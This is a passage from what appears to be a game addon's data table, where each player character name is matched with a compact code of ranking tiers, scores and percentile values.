["Moonvale"] = "ET:206/76%EB:642/90%EM:664/84%",
["Magelyf"] = "CT:26/0%UB:161/44%UM:144/47%",
["Fatshots"] = "UB:229/28%RM:644/69%",
["Thiccheeks"] = "EB:594/75%EM:720/79%",
["Redtestament"] = "ET:319/88%EB:435/82%EM:827/85%",
["Aoemeilan"] = "CT:38/17%CB:154/20%UM:144/47%",
["Ashe"] = "UM:443/45%",
["Anima"] = "CT:84/10%LB:780/97%LM:967/97%",
["Bombz"] = "EB:648/84%EM:897/93%",
["Bawonsamdii"] = "UB:106/29%CM:144/13%",
["Thugñasty"] = "RB:396/55%RM:559/59%",
["Sz"] = "CT:83/8%EB:649/87%EM:731/80%",
["Fliphazard"] = "CT:31/7%LB:791/98%EM:882/89%",
["Krickett"] = "EB:634/83%RM:581/63%",
["Rexz"] = "CB:31/2%CM:240/24%",
["Pressure"] = "LT:763/97%LB:766/96%LM:977/98%",
["Chuhai"] = "RT:139/50%EB:525/93%",
["Choldrich"] = "CT:38/16%CB:26/0%CM:59/22%",
["Xiaoshenxian"] = "UT:276/38%RB:281/64%EM:729/77%",
["Lryine"] = "CB:41/4%CM:127/17%",
["Blazonry"] = "UT:335/44%EB:616/80%EM:894/92%",
["Addisonrae"] = "UB:148/46%RM:232/52%",
["Nowserving"] = "RB:484/62%EM:782/81%",
["Gingerpickle"] = "EB:643/87%EM:778/84%",
["Sykø"] = "CT:179/24%LB:773/97%LM:978/98%",
["Moobtwister"] = "UB:229/31%RM:504/52%",
["Darkmagic"] = "CM:26/0%",
["Sheril"] = "CB:142/17%CM:180/17%",
["Grandview"] = "CB:131/16%EM:737/77%",
["Shredlife"] = "RM:361/67%",
["Quikbolts"] = "CB:77/19%CM:24/2%",
["Miniwoozie"] = "CB:80/9%RM:575/68%",
["Az"] = "CM:225/22%",
["Magethings"] = "CB:69/7%RM:471/51%",
["Sarthetwitch"] = "UT:324/43%LB:782/98%LM:977/98%",
["Nelkazra"] = "CM:60/7%",
["Needgold"] = "ET:290/84%RB:426/62%UM:358/42%",
["Tacochu"] = "CM:123/11%",
["Marisi"] = "EB:582/76%EM:752/81%",
["Cannazym"] = "CB:54/5%RM:499/51%",
["Delorae"] = "ET:232/76%RB:274/63%RM:564/60%",
["Gilgameshnwn"] = "UM:274/28%",
["Bunnyhumper"] = "RT:60/51%EB:603/89%EM:669/86%",
["Aquilaaria"] = "UM:109/35%",
["Justjaze"] = "EM:600/78%",
["Derltok"] = "EB:572/79%EM:879/92%",
["Cwuddles"] = "RB:377/52%RM:608/71%",
["Allissandra"] = "RM:657/68%",
["Tinster"] = "ET:276/87%RB:391/54%EM:675/94%",
["Eafm"] = "CM:245/24%",
["Juand"] = "RT:231/74%RB:481/64%EM:563/90%",
["Toogood"] = "EB:556/77%EM:790/86%",
["Rofelcakes"] = "EM:823/81%",
["Mingzi"] = "RB:510/70%EM:809/87%",
["Shikì"] = "UM:117/33%",
["Kmàrt"] = "UT:75/28%EB:387/82%",
["Slapz"] = "LB:764/96%LM:970/98%",
["Sebassdragon"] = "EB:330/83%CM:22/15%",
["Spiritmagekm"] = "RM:533/59%",
["Smashkey"] = "UM:320/35%",
["Slendrafghan"] = "CM:76/6%",
["Ferdà"] = "CM:95/7%",
["Bøngle"] = "UB:239/30%RM:355/71%",
["Tyca"] = "UM:397/42%",
["Fanr"] = "CB:174/22%UM:345/36%",
["Mimiki"] = "UB:293/38%RM:572/63%",
["Icebag"] = "CB:34/3%UM:334/35%",
["Draigbull"] = "RM:271/60%",
["Kohl"] = "CT:25/2%RB:483/69%",
["Teslâ"] = "UB:223/28%RM:533/59%",
["Bluecheese"] = "UM:445/48%",
["Winterbound"] = "CT:76/6%EB:557/77%EM:815/88%",
["Knuf"] = "CB:138/17%UM:447/48%",
["Stunkill"] = "RM:496/53%",
["Fadeaway"] = "RB:485/67%EM:834/88%",
["Olangus"] = "RB:480/66%EM:757/82%",
["Kucci"] = "EM:688/79%",
["Domerz"] = "LB:754/95%SM:994/99%",
["Spinaltaps"] = "UB:212/28%EM:704/75%",
["Aidugodv"] = "ET:796/94%LB:742/97%LM:925/96%",
["Wolfillfixit"] = "EB:308/75%RM:515/72%",
["Aisakataiga"] = "EB:711/89%EM:870/89%",
["Tinyairline"] = "EB:621/80%EM:807/80%",
["Ovaltineplz"] = "UB:270/35%RM:566/63%",
["Slamshut"] = "UM:451/47%",
["Diole"] = "UB:191/25%CM:114/14%",
["Sigi"] = "CT:63/23%EB:711/90%EM:476/82%",
["Lunarfury"] = "LT:411/95%LB:748/96%LM:952/98%",
["Jarvans"] = "EB:605/83%EM:771/83%",
["Wanpunch"] = "UB:237/30%RM:611/67%",
["Moscone"] = "RT:202/69%RB:585/74%EM:880/90%",
["Avramax"] = "RT:139/52%RB:467/61%UM:440/45%",
["Cruzz"] = "RB:210/51%CM:53/20%",
["Hemang"] = "CB:97/12%",
["Crunkshot"] = "RT:476/67%EB:724/91%LM:974/98%",
["Twînkîe"] = "UT:73/27%RB:485/64%EM:898/91%",
["Kadywompus"] = "RM:688/73%",
["Arixxthor"] = "RB:410/56%RM:633/69%",
["Ramrodicus"] = "EB:639/86%EM:807/86%",
["Furìous"] = "EB:676/85%EM:833/86%",
["Ezfarm"] = "UB:183/49%RM:534/63%",
["Bobmarlock"] = "ET:250/77%EB:537/91%EM:731/76%",
["Notmynova"] = "CM:223/22%",
["Mavv"] = "CT:68/8%EB:742/93%LM:951/96%",
["Clata"] = "UM:409/44%",
["Bani"] = "RM:576/61%",
["Wrax"] = "UM:428/48%",
["Tricton"] = "CB:105/12%RM:561/62%",
["Tntdd"] = "CB:27/0%CM:32/1%",
["Depart"] = "EB:471/85%RM:509/54%",
["Kemist"] = "RB:423/57%LM:955/96%",
["Scrotium"] = "CB:75/9%CM:60/5%",
["Uglykid"] = "RB:555/72%RM:641/62%",
["Agamath"] = "UM:138/41%",
["Kiefdust"] = "EB:592/82%RM:596/70%",
["Remote"] = "LB:776/97%LM:970/98%",
["Manawi"] = "RM:477/52%",
["Taurenmale"] = "EB:689/91%LM:959/98%",
["Hydrxlisk"] = "EB:588/82%EM:773/84%",
["Fourfreedom"] = "CB:43/4%",
["Yurinminami"] = "UB:257/34%CM:27/0%",
["Zauner"] = "RM:526/55%",
["Serio"] = "CM:3/0%",
["Pizzwatt"] = "RB:358/74%EM:707/75%",
["Bic"] = "RT:182/64%UB:136/35%RM:677/74%",
["Mirisha"] = "CT:66/24%UB:360/48%UM:99/34%",
["Venerous"] = "ET:297/85%EB:658/85%EM:845/88%",
["Ganksterr"] = "RB:379/52%UM:431/49%",
["Grimfart"] = "RB:291/54%EM:695/84%",
["Kekee"] = "RT:160/58%EB:647/88%EM:826/87%",
["Cutewick"] = "UB:217/29%UM:228/28%",
["Slowman"] = "UT:121/28%UB:177/38%",
["Projectvayne"] = "EB:662/85%EM:752/79%",
["Huha"] = "CB:139/17%RM:427/51%",
["Kreamxxy"] = "UM:88/34%",
["Spoils"] = "CT:62/21%RB:299/66%EM:411/75%",
["Mamont"] = "CB:82/9%CM:102/12%",
["Bwllol"] = "CM:31/3%",
["Milkedurmom"] = "CM:35/3%",
["Bloodgundam"] = "CM:30/2%",
["Maera"] = "CM:228/23%",
["Hañs"] = "UT:286/38%EB:742/93%EM:879/90%",
["Âtreyu"] = "RB:390/61%EM:652/82%",
["Smldikmafia"] = "CT:173/23%RB:537/69%EM:741/78%",
["Lolspyololol"] = "RT:346/72%EB:575/83%EM:580/77%",
["Gamergrille"] = "RM:486/53%",
["Skank"] = "ET:224/77%EB:706/92%LM:922/97%",
["Mukadekouhai"] = "UM:117/39%",
["Imjustsaiyan"] = "ET:227/80%LB:717/96%EM:738/90%",
["Connelly"] = "CM:130/16%",
["Shreelock"] = "ET:335/88%EB:630/81%EM:717/75%",
["Baconite"] = "RM:217/54%",
["Laurra"] = "CB:40/3%UM:90/33%",
["Coldcake"] = "CT:131/16%RB:451/64%RM:584/64%",
["Krispykream"] = "CB:25/0%CM:52/6%",
["Totalwar"] = "UT:182/28%EB:597/76%EM:701/77%",
["Ashiefz"] = "RM:491/73%",
["Upgrade"] = "UM:276/33%",
["Orgazmoh"] = "RB:282/67%EM:431/83%",
["Lunzo"] = "RM:345/70%",
["Celestria"] = "RM:239/63%",
["Zamiul"] = "RB:488/65%EM:763/82%",
["Eggshell"] = "RT:457/69%LB:698/95%EM:744/90%",
["Bluespartan"] = "CT:122/20%CM:194/20%",
["Stabyourfeet"] = "EB:596/78%EM:796/84%",
["Hetaira"] = "CT:0/0%EB:634/83%EM:747/81%",
["Sundaybuffs"] = "CT:37/10%UM:371/40%",
["Velosity"] = "RT:150/62%EB:531/85%RM:414/70%",
["Naughtynurse"] = "RB:525/73%EM:737/81%",
["Badelf"] = "CM:26/0%",
["Kosmosshot"] = "CB:78/9%UM:112/38%",
["Foilage"] = "CT:49/10%RB:471/59%RM:558/64%",
["Itzalljeezy"] = "UB:301/37%RM:506/54%",
["Factsnlogic"] = "UT:257/39%RB:243/61%EM:690/75%",
["Cruelle"] = "CM:93/13%",
["Uhsheesh"] = "UB:313/41%EM:759/79%",
["Benevoli"] = "RT:220/73%CB:131/15%UM:387/49%",
["Meleemage"] = "RB:238/60%RM:505/60%",
["Bigcboyjr"] = "RB:238/55%RM:209/50%",
["Bonkzs"] = "EB:582/77%RM:597/73%",
["Hamap"] = "CB:68/6%CM:183/17%",
["Redairoh"] = "EB:610/79%EM:766/80%",
["Fzuudhun"] = "ET:619/81%RB:562/72%EM:742/78%",
["Simplad"] = "ET:702/90%EB:652/82%EM:780/82%",
["Ipoodnurfood"] = "CB:138/17%RM:678/74%",
["Tealeaf"] = "UM:133/43%",
["Blark"] = "CB:113/12%CM:40/13%",
["Murdis"] = "CB:97/8%RM:541/59%",
["Percil"] = "RB:547/73%RM:636/74%",
["Chainhealing"] = "UB:247/32%RM:609/68%",
["Hordi"] = "CM:151/19%",
["Jebaitid"] = "RT:276/64%EB:695/93%EM:869/94%",
["Punchline"] = "UB:265/36%RM:578/64%",
["Headfrost"] = "UB:217/27%UM:353/37%",
["Lunox"] = "UB:311/40%RM:499/54%",
["Maoainaiyo"] = "CM:138/16%",
["Spitonme"] = "LB:751/95%LM:924/95%",
["Shigerukane"] = "CM:167/16%",
["Oakoaks"] = "CB:26/0%CM:45/6%",
["Supercrow"] = "UT:124/44%UB:378/48%RM:513/53%",
["Uzrrip"] = "ET:736/94%EB:715/90%RM:647/72%",
["Wuwueawu"] = "RM:638/68%",
["Ummster"] = "ET:674/88%EB:688/88%EM:854/88%",
["Laurencius"] = "CT:26/4%CB:27/2%CM:68/8%",
["Fishbait"] = "CT:61/11%RB:383/60%RM:469/68%",
["Reygeypist"] = "CT:44/18%UB:329/37%UM:441/46%",
["Dinglesham"] = "RT:171/52%CB:73/18%CM:76/8%",
["Wuhanrefugee"] = "LT:490/96%EB:530/92%LM:958/97%",
["Yoomi"] = "ET:415/94%LB:754/95%LM:962/97%",
["Grates"] = "RT:234/72%EB:657/84%EM:821/85%",
["Shartling"] = "EB:616/81%EM:752/81%",
["Resentful"] = "RB:247/56%UM:150/43%",
["Skeetslingin"] = "UT:105/41%EB:584/93%EM:919/93%",
["Castellan"] = "CT:188/24%EB:463/88%EM:846/89%",
["Coldblud"] = "RM:610/71%",
["Waynebrusov"] = "CM:68/8%",
["Illiono"] = "RB:526/69%RM:665/69%",
["Ecin"] = "UB:356/49%RM:274/68%",
["Dotopoulos"] = "EB:641/83%EM:810/84%",
["Swiftz"] = "RM:183/65%",
["Orf"] = "RM:662/71%",
["Contrixion"] = "UM:145/39%",
["Vyale"] = "RM:300/71%",
["Mysfortune"] = "UB:374/44%UM:459/48%",
["Odawa"] = "CM:44/11%",
["Stinkyhead"] = "UM:113/40%",
["Akkane"] = "CM:227/23%",
["Leechseed"] = "UM:20/25%",
["Reamage"] = "RM:256/65%",
["Tatankawhite"] = "RB:178/62%RM:318/63%",
["Dudestorm"] = "EB:681/87%LM:942/95%",
["Quatre"] = "EM:558/75%",
["Arcaedia"] = "RT:422/64%LB:739/97%EM:764/91%",
["Bits"] = "RM:292/57%",
["Trt"] = "EB:576/76%EM:767/82%",
["Hentajuju"] = "RT:147/54%CB:39/3%CM:66/23%",
["Cyean"] = "UB:299/38%CM:20/4%",
["Gny"] = "UT:110/42%EB:617/80%EM:756/79%",
["Nfts"] = "RT:361/50%RB:274/60%RM:614/69%",
["Lightup"] = "UB:236/30%RM:613/68%",
["Childlabour"] = "CM:64/18%",
["Trumpmebaby"] = "UB:355/49%RM:180/54%",
["Glaciüs"] = "EB:374/80%RM:259/66%",
["Incanus"] = "RB:197/51%RM:491/58%",
["Chrisfearly"] = "CB:61/16%CM:52/21%",
["Tgx"] = "EB:683/88%LM:986/98%",
["Rhakshara"] = "UM:28/25%",
["Woober"] = "UT:98/38%RB:444/64%UM:369/39%",
["Marash"] = "CT:56/20%CB:132/17%CM:100/9%",
["Soulmage"] = "UT:201/31%EB:564/79%UM:234/29%",
["Rottenshard"] = "RB:382/51%RM:535/55%",
["Sonoe"] = "RB:412/53%RM:592/63%",
["Cliquezici"] = "RM:253/59%",
["Korruptor"] = "UB:256/34%EM:861/88%",
["Quickmagic"] = "UM:109/39%",
["Karaver"] = "RM:502/53%",
["Levitra"] = "CM:50/17%",
["Sizzlewidget"] = "CM:167/18%",
["Vestemona"] = "RM:556/61%",
["Tanaomin"] = "UM:122/42%",
["Onsjw"] = "CB:26/0%RM:193/50%",
["Littleshiiet"] = "UB:279/37%RM:528/62%",
["Mcboogerball"] = "CM:148/18%",
["Reducio"] = "UM:148/48%",
["Wizowd"] = "UT:201/26%EB:554/77%RM:530/58%",
["Nocsia"] = "RB:398/68%EM:763/88%",
["Majakí"] = "RM:312/56%",
["Dudechillbro"] = "RM:537/59%",
["Pharmacist"] = "UB:283/38%RM:258/58%",
["Jassix"] = "RB:428/56%EM:851/89%",
["Imperialwzrd"] = "RT:160/58%EB:574/80%EM:758/85%",
["Dree"] = "CB:97/10%RM:541/61%",
["Nevergear"] = "UT:346/48%EB:728/92%LM:970/98%",
["Umbreonee"] = "EB:563/80%UM:406/43%",
["Sashy"] = "UB:257/31%CM:69/6%",
["Abrablinkin"] = "EB:600/83%UM:302/31%",
["Vred"] = "CT:182/23%UB:219/28%EM:904/91%",
["Thundergnome"] = "RM:609/65%",
["Ovis"] = "RM:589/69%",
["Economey"] = "CB:64/5%UM:369/44%",
["Kryptocrack"] = "EB:667/89%EM:854/92%",
["Billybovine"] = "EB:663/89%EM:864/91%",
["Kango"] = "RB:431/57%EM:781/84%",
["Onenova"] = "UM:324/39%",
["Eunsin"] = "RM:514/57%",
["Slaneesh"] = "CB:44/4%RM:637/68%",
["Lòktar"] = "CB:31/2%RM:243/58%",
["Målik"] = "CB:137/16%UM:129/36%",
["Sqeakers"] = "UM:94/36%",
["Moobcake"] = "RB:226/53%RM:298/65%",
["Yubumagic"] = "CB:119/16%RM:205/58%",
["Luker"] = "EB:748/94%RM:608/65%",
["Shozgodx"] = "EB:735/93%EM:891/91%",
["Pilipilipoom"] = "EM:681/75%",
["Meeobsessed"] = "CM:15/21%",
["Ceo"] = "EB:745/94%LM:940/96%",
["Aiwaner"] = "EB:562/79%RM:590/65%",
["Yoonbomi"] = "RB:199/50%UM:396/42%",
["Innout"] = "CT:28/9%EB:415/81%RM:623/67%",
["Haroldbeaver"] = "UB:364/48%RM:441/51%",
["Demotivation"] = "UB:133/35%UM:413/42%",
["Soroz"] = "UB:330/43%RM:520/57%",
["Yse"] = "RB:257/59%RM:599/62%",
["Sylenia"] = "EM:872/93%",
["Deathex"] = "CB:29/3%UM:104/34%",
["Hina"] = "CB:50/7%EM:855/92%",
["Xrày"] = "CB:104/12%RM:663/73%",
["Volgren"] = "CM:173/20%",
["Forgotports"] = "CM:46/5%",
["Vinfreezel"] = "RB:537/71%RM:203/58%",
["Poggersdaddy"] = "CM:204/20%",
["Swoleosopher"] = "ET:628/89%LB:686/95%EM:794/92%",
["Protwarriór"] = "RM:435/65%",
["Mindboggler"] = "UT:361/49%EB:644/84%EM:719/75%",
["Pkfreeze"] = "CM:74/10%",
["Funkystuff"] = "CB:143/15%EM:856/88%",
["Tithemi"] = "UM:308/36%",
["Topdps"] = "UB:258/30%RM:503/58%",
["Asger"] = "CM:121/14%",
["Radchad"] = "CM:46/17%",
["Dots"] = "UT:121/43%RB:518/68%EM:881/89%",
["Urbansix"] = "UM:324/38%",
["Frigidlich"] = "CM:104/15%",
["Dylweed"] = "CM:29/1%",
["Valki"] = "CM:202/23%",
["Realmmccutie"] = "EB:573/76%RM:692/72%",
["Snakejazz"] = "CB:185/22%EM:735/80%",
["Bownutzz"] = "RB:468/64%EM:827/86%",
["Pwnedstar"] = "ET:667/86%EB:596/78%EM:801/83%",
["Kitshia"] = "CM:144/13%",
["Warthole"] = "RB:522/74%EM:699/80%",
["Xiaolieren"] = "EB:555/75%UM:366/41%",
["Lilbuddy"] = "EB:693/89%EM:841/88%",
["Obsydina"] = "CM:39/5%",
["Soluck"] = "RB:458/61%EM:749/81%",
["Winfury"] = "RT:106/59%EB:500/76%EM:690/81%",
["Spinz"] = "UT:71/26%EB:576/76%EM:774/83%",
["Manslayer"] = "CT:179/22%UB:277/36%UM:405/42%",
["Mhediv"] = "CM:9/2%",
["Ykwtfgo"] = "CB:71/8%RM:680/72%",
["Zakrogar"] = "RB:504/64%RM:639/68%",
["Warriar"] = "EB:600/76%EM:833/86%",
["Huegrect"] = "CM:57/21%",
["Cripfolife"] = "CM:14/5%",
["Saveuras"] = "RB:446/68%EM:615/79%",
["Zugx"] = "CB:94/10%UM:95/32%",
["Kamalí"] = "UB:293/37%CM:245/24%",
["Cnwhite"] = "CT:56/22%LB:778/98%LM:952/97%",
["Bakesale"] = "CT:95/12%EB:752/94%LM:935/95%",
["Homley"] = "UB:170/43%UM:301/30%",
["Malfurian"] = "EM:705/78%",
["Plazmid"] = "LM:875/95%",
["Kirsten"] = "UM:434/47%",
["Takdar"] = "UT:76/32%UB:79/29%UM:93/47%",
["Coletrains"] = "CT:151/17%UB:330/44%RM:584/65%",
["Charlymurphy"] = "CB:83/10%CM:147/17%",
["Zfire"] = "CB:66/7%CM:121/17%",
["Himsa"] = "CT:60/21%LB:629/95%EM:814/86%",
["Justicerawr"] = "CT:34/3%RB:439/57%EM:775/81%",
["Mehe"] = "UB:121/30%CM:186/22%",
["Boomhauer"] = "RM:677/72%",
["Nfamousmushu"] = "ET:447/94%EB:467/84%EM:766/80%",
["Majja"] = "UM:94/36%",
["Bozley"] = "UB:312/42%UM:285/34%",
["Brothabear"] = "ET:261/91%EB:499/93%EM:664/86%",
["Grend"] = "LB:770/98%LM:953/97%",
["Boomagic"] = "EB:638/87%EM:767/86%",
["Mandalawangi"] = "RT:131/50%UB:135/36%CM:199/23%",
["Depreston"] = "CM:62/8%",
["Wombraider"] = "EB:540/85%EM:538/78%",
["Zubsterz"] = "EB:557/78%EM:758/82%",
["Gloam"] = "CM:233/23%",
["Marox"] = "RM:543/56%",
["Jarlo"] = "CB:95/9%UM:304/31%",
["Flapjackz"] = "RT:536/68%EB:696/94%SM:1003/99%",
["Floorchopp"] = "RM:518/55%",
["Yogotti"] = "CT:32/3%CB:59/6%",
["Bobabubbles"] = "RB:464/64%EM:694/77%",
["Maokaiss"] = "ET:261/77%EB:387/76%EM:734/76%",
["Ereedoj"] = "EB:587/75%EM:927/94%",
["Shakeñßake"] = "UT:394/49%EB:671/91%LM:925/96%",
["Arrusai"] = "ET:328/88%EB:725/92%EM:891/92%",
["Harco"] = "CT:44/18%RB:548/70%EM:769/81%",
["Moociful"] = "RM:350/74%",
["Halokitty"] = "UM:369/39%",
["Calciferr"] = "CT:164/19%EB:705/93%LM:892/95%",
["Vallerya"] = "UM:212/30%",
["Kazule"] = "RT:166/72%EB:665/92%EM:760/89%",
["Hoss"] = "LB:774/97%LM:974/98%",
["Marshmalloh"] = "RT:191/58%EB:703/94%EM:755/83%",
["Wowmagic"] = "UB:180/48%RM:644/71%",
["Elmo"] = "LB:799/98%LM:985/98%",
["Sappii"] = "CM:5/2%",
["Blashcleave"] = "RT:476/65%EB:645/83%EM:838/89%",
["Riphook"] = "CM:86/11%",
["Crashnak"] = "UB:356/45%RM:387/73%",
["Mahiwka"] = "EB:628/82%EM:671/91%",
["Miita"] = "UB:366/49%RM:519/57%",
["Mintjuulpods"] = "EB:695/92%EM:902/93%",
["Torogra"] = "CT:78/9%UB:328/44%RM:280/64%",
["Justaa"] = "RM:551/60%",
["Dysbearing"] = "EB:576/79%EM:677/75%",
["Mercie"] = "CB:91/11%UM:374/43%",
["Kumonsluts"] = "CB:29/1%",
["Britneybeers"] = "CB:37/2%CM:124/17%",
["Kaibro"] = "RM:486/57%",
["Ntuition"] = "RT:519/69%RB:475/69%",
["Micaiah"] = "EB:615/85%EM:833/90%",
["Coppertop"] = "RB:553/73%EM:807/86%",
["Vistilance"] = "RB:221/54%",
["Deshunia"] = "RT:199/68%UB:161/42%RM:483/53%",
["Locdog"] = "UB:198/48%RM:598/62%",
["Utterphales"] = "RM:192/50%",
["Bava"] = "EM:551/86%",
["Shurl"] = "RB:565/74%UM:375/38%",
["Nengrendom"] = "CM:64/5%",
["Camilla"] = "UT:304/43%EB:689/87%EM:784/82%",
["Mudbutt"] = "UB:176/42%UM:386/44%",
["Eliminator"] = "UB:196/48%RM:513/51%",
["Sappedsorry"] = "UB:274/36%RM:571/63%",
["Ragnuros"] = "ET:418/94%EB:678/88%EM:797/85%",
["Lidiah"] = "CB:27/0%UM:278/28%",
["Nightrise"] = "UT:324/42%EB:584/77%EM:815/86%",
["Akembk"] = "LT:747/95%EB:745/94%CM:57/21%",
["Lastwinter"] = "UB:345/47%EM:759/82%",
["Chabikdu"] = "RT:550/73%LB:770/97%EM:864/89%",
["Nherzul"] = "CT:71/8%",
["Mvlad"] = "UB:130/34%EM:724/76%",
["Onelock"] = "UB:202/25%UM:403/41%",
["Demize"] = "RB:412/56%RM:661/69%",
["Syuñ"] = "UB:150/41%RM:509/60%",
["Dnme"] = "LB:747/95%EM:877/91%",
["Oveyron"] = "UB:247/31%UM:367/39%",
["Dmbuffsplz"] = "EB:586/78%EM:743/78%",
["Liseris"] = "CT:35/8%UM:278/32%",
["Farmadeus"] = "UM:72/27%",
["Yomrbeard"] = "LB:779/97%LM:965/97%",
["Winpal"] = "CT:30/6%RB:508/70%UM:368/39%",
["Skyrise"] = "EB:621/85%EM:735/86%",
["Stabjin"] = "CT:113/14%UB:218/28%RM:326/65%",
["Firulais"] = "UB:257/34%RM:623/68%",
["Kelist"] = "UM:350/41%",
["Shandala"] = "UM:290/49%",
["Mithril"] = "UB:296/40%EM:744/80%",
["Dwamoonir"] = "RB:444/58%RM:581/62%",
["Tankrus"] = "EB:628/80%EM:926/94%",
["Cherie"] = "EM:871/91%",
["Joft"] = "CB:38/7%RM:200/57%",
["Stabbenya"] = "RB:548/70%RM:332/65%",
["Acitoxe"] = "UM:102/30%",
["Necrozen"] = "CT:62/23%EB:667/87%EM:899/93%",
["Leola"] = "CM:123/15%",
["Icedpea"] = "UM:88/33%",
["Diets"] = "UM:152/49%",
["Saucy"] = "CB:70/7%CM:58/20%",
["Callahan"] = "LB:707/97%EM:604/88%",
["Fearvayne"] = "ET:617/82%LB:733/98%EM:749/94%",
["Miyamola"] = "CT:65/24%RB:390/53%RM:557/62%",
["Marc"] = "CM:58/22%",
["Careey"] = "CM:27/6%",
["Geegez"] = "CB:80/21%UM:101/35%",
["Wolfsok"] = "UM:388/40%",
["Tazinkani"] = "RB:500/66%RM:577/63%",
["Slizzer"] = "UM:81/31%",
["Remiels"] = "RB:552/73%EM:787/82%",
["Reice"] = "RB:526/67%EM:822/85%",
["Fiddlêr"] = "CB:56/12%RM:582/64%",
["Chauncey"] = "CT:85/15%RB:517/66%EM:835/87%",
["Koloss"] = "UT:278/37%EB:688/88%EM:851/88%",
["Threemi"] = "CB:70/8%UM:299/30%",
["Xiaoyin"] = "CM:74/6%",
["Soudane"] = "RT:177/58%EB:613/89%EM:743/88%",
["Fråcture"] = "EB:537/75%EM:507/88%",
["Dinaxel"] = "ET:236/75%EB:733/92%EM:496/82%",
["Notable"] = "EB:639/83%EM:753/81%",
["Wildstyle"] = "CB:61/13%UM:101/33%",
["Lemmehealya"] = "RM:284/64%",
["Loothugga"] = "CT:63/12%RB:551/70%EM:441/78%",
["Diablobombs"] = "RB:517/66%RM:696/74%",
["Wackyniv"] = "CT:151/19%UM:85/30%",
["Synjyn"] = "CM:2/0%",
["Zimask"] = "UB:267/35%RM:540/60%",
["Misscleo"] = "CM:128/15%",
["Fraustina"] = "UM:72/27%",
["Rytheran"] = "UM:168/47%",
["Clocker"] = "UB:229/25%CM:135/15%",
["Adorkabull"] = "RT:69/55%EB:574/88%RM:336/65%",
["Gorky"] = "RM:322/64%",
["Leifengfeng"] = "EB:675/85%EM:813/84%",
["Pròtótype"] = "EB:705/93%LM:965/98%",
["Mimixd"] = "LB:761/95%EM:919/93%",
["Bigsorcyred"] = "ET:317/87%EB:493/89%RM:202/58%",
["Klavine"] = "UT:112/43%EB:572/77%LM:950/96%",
["Chadikyns"] = "UT:366/47%EB:500/87%RM:234/53%",
["Bear"] = "RM:170/51%",
["Vedist"] = "UM:99/34%",
["Plushberry"] = "CB:168/21%RM:209/59%",
["Nightchick"] = "CB:46/10%UM:142/43%",
["Sisyphus"] = "RB:470/62%RM:450/51%",
["Pirotesse"] = "UB:367/49%RM:341/71%",
["Trukk"] = "EB:684/87%EM:750/94%",
["Avenknight"] = "UB:269/31%RM:202/52%",
["Alakazambam"] = "ET:319/87%RB:466/62%RM:674/74%",
["Definately"] = "CT:36/6%UB:364/49%RM:564/62%",
["Badbunni"] = "UM:311/31%",
["Sylba"] = "UB:139/34%UM:338/39%",
["Huhter"] = "RM:622/66%",
["Beenzy"] = "CB:159/19%UM:361/42%",
["Marypoppìns"] = "RB:502/66%EM:555/86%",
["Shuniøn"] = "RB:444/63%RM:584/68%",
["Sifter"] = "ET:708/91%LB:785/98%LM:963/97%",
["Koushira"] = "EB:617/85%EM:791/89%",
["Durantula"] = "EB:697/89%EM:869/89%",
["Kriegher"] = "EM:732/80%",
["Dotyml"] = "UB:116/30%EM:717/77%",
["Eillynna"] = "UT:371/48%EB:565/75%EM:781/83%",
["Faeth"] = "CB:56/4%RM:590/65%",
["Lovehate"] = "LB:778/97%LM:931/95%",
["Shadôwfang"] = "EB:707/93%LM:932/96%",
["Barainto"] = "EB:737/93%EM:859/88%",
["Oranngemage"] = "UB:362/47%RM:462/54%",
["Mowgle"] = "CT:38/4%CB:135/17%UM:253/31%",
["Kharkhad"] = "CB:191/20%RM:256/59%",
["Belaphor"] = "UM:100/40%",
["Miryin"] = "RM:361/71%",
["Onaad"] = "CB:82/10%UM:449/47%",
["Sploosh"] = "EB:608/83%RM:657/73%",
["Freefarm"] = "UB:139/36%RM:562/62%",
["Potatofry"] = "RB:251/62%RM:657/72%",
["Driveby"] = "RM:667/72%",
["Mayak"] = "UM:290/29%",
["Pureheart"] = "LB:775/97%SM:1037/99%",
["Tprtm"] = "CM:27/5%",
["Funpi"] = "UT:122/44%UB:246/31%RM:531/59%",
["Mongolianbbq"] = "RM:232/56%",
["Zakutwo"] = "RB:375/64%EM:404/77%",
["Darabomba"] = "RM:227/52%",
["Kenshow"] = "CM:33/9%",
["Hakunaa"] = "CB:60/6%EM:826/84%",
["Smitteye"] = "CB:157/19%RM:723/70%",
["Reavs"] = "LB:738/96%EM:866/91%",
["Bolita"] = "UM:222/47%",
["Ceesong"] = "UB:367/48%LM:983/98%",
["Hfcslayer"] = "UB:385/48%RM:758/73%",
["Tege"] = "RM:495/50%",
["Hfccowkiller"] = "UB:241/30%UM:207/25%",
["Nakor"] = "EB:742/93%EM:866/89%",
["Bandwire"] = "RM:630/59%",
["Drugfreegirl"] = "RB:549/70%LM:953/95%",
["Divided"] = "RM:197/50%",
["Neme"] = "EM:848/89%",
["Fayori"] = "SB:839/99%SM:1004/99%",
["Dethek"] = "UM:263/35%",
["Xender"] = "UB:251/32%RM:670/69%",
["Haxpax"] = "EM:814/79%",
["Imthebest"] = "CM:100/12%",
["Around"] = "UM:259/31%",
["Chubits"] = "UM:266/32%",
["Tokki"] = "UM:214/29%",
["Rinsed"] = "EB:733/92%EM:876/90%",
["Kruggyb"] = "EB:724/94%LM:959/98%",
["Vendilion"] = "EM:808/78%",
["Frankito"] = "EB:679/87%EM:790/82%",
["Prue"] = "CM:140/17%",
["Dieseltaco"] = "EB:557/77%LM:938/96%",
["Maorong"] = "EB:623/86%EM:861/92%",
["Moisthands"] = "RB:441/56%EM:891/91%",
["Uhm"] = "LB:795/98%LM:987/98%",
["Zoburanda"] = "RB:437/67%EM:630/80%",
["Gosh"] = "RM:551/62%",
["Geeunit"] = "CM:77/11%",
["Mithrili"] = "RM:657/62%",
["Royalmember"] = "CB:26/0%EM:880/89%",
["Mylazyhealer"] = "EB:498/76%LM:886/96%",
["Chelis"] = "LM:972/97%",
["Ninihui"] = "EM:915/94%",
["Lloolo"] = "CM:164/15%",
["Rampagex"] = "RB:417/51%EM:781/82%",
["Zhadowz"] = "RM:402/60%",
["Lysdexia"] = "UM:314/40%",
["Onicez"] = "RM:743/71%",
["Noramak"] = "LB:775/97%EM:917/94%",
["Pizzarock"] = "CM:52/1%",
["Dchez"] = "CM:65/7%",
["Kilosren"] = "UB:274/33%EM:859/85%",
["Skoobasteve"] = "RB:404/53%RM:509/56%",
["Nordreich"] = "RM:658/60%",
["Stellár"] = "EB:611/84%LM:921/95%",
["Dissolvent"] = "CM:52/2%",
["Edgelordchad"] = "UB:380/45%RM:654/59%",
